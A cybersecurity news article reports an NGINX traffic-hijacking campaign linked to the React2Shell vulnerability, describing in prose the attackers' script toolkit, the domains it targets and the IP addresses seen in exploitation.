NGINX servers are at the centre of an ongoing web traffic hijacking campaign uncovered by cybersecurity researchers, who found attackers abusing vulnerable installations and management panels such as Baota. The operation is designed to silently redirect legitimate user traffic through infrastructure controlled by the attackers, increasing the risk of data interception and broader system compromise.
Security analysts said threat actors linked to the recent React2Shell vulnerability CVE 2025 55182 with a CVSS score of 10.0 are behind the activity. According to researchers, “The malicious configuration intercepts legitimate web traffic between users and websites and routes it through attacker controlled backend servers.” The campaign mainly targets Asian country domains including .in, .id, .pe, .bd and .th, along with Chinese hosting environments using the Baota Panel and government and education domains such as .gov and .edu.
The attack relies on shell scripts that inject harmful configuration rules into NGINX, which is widely used as an open source reverse proxy and load balancer. These rules use specific location paths to capture incoming requests and forward them to attacker owned domains using the proxy_pass directive. Investigators said the scripts are part of a multi stage toolkit built to ensure persistence and continuous traffic redirection. The toolkit includes zx.sh to orchestrate execution, bt.sh to overwrite NGINX files in Baota environments, 4zdh.sh to scan common NGINX locations, zdh.sh to focus on Linux and container based setups targeting .in and .id domains, and ok.sh to generate reports of active hijacking rules. “The toolkit contains target discovery and several scripts designed for persistence and the creation of malicious configuration files containing directives intended to redirect web traffic.”
The findings come as a threat intelligence firm reported that 2 IP addresses, 193.142.147.209 and 87.121.84.24, were responsible for 56% of observed exploitation attempts within 2 months of React2Shell becoming public. Between January 26 and February 2, 2026, 1,083 unique source IPs were linked to exploitation. “The dominant sources deploy distinct post exploitation payloads,” the firm said, noting cryptomining and reverse shell activity. The campaign also follows a large reconnaissance effort targeting Citrix ADC and Netscaler gateways using residential proxies and a single cloud IP, “52.139.3.76,” aimed at finding login panels and identifying software versions.
Also read: Viksit Workforce for a Viksit Bharat
Do Follow: The Mainstream formerly known as CIO News LinkedIn Account | The Mainstream formerly known as CIO News Facebook | The Mainstream formerly known as CIO News Youtube | The Mainstream formerly known as CIO News Twitter
About us:
The Mainstream is a premier platform delivering the latest updates and informed perspectives across the technology business and cyber landscape. Built on research-driven, thought leadership and original intellectual property, The Mainstream also curates summits & conferences that convene decision makers to explore how technology reshapes industries and leadership. With a growing presence in India and globally across the Middle East, Africa, ASEAN, the USA, the UK and Australia, The Mainstream carries a vision to bring the latest happenings and insights to 8.2 billion people and to place technology at the centre of conversation for leaders navigating the future.
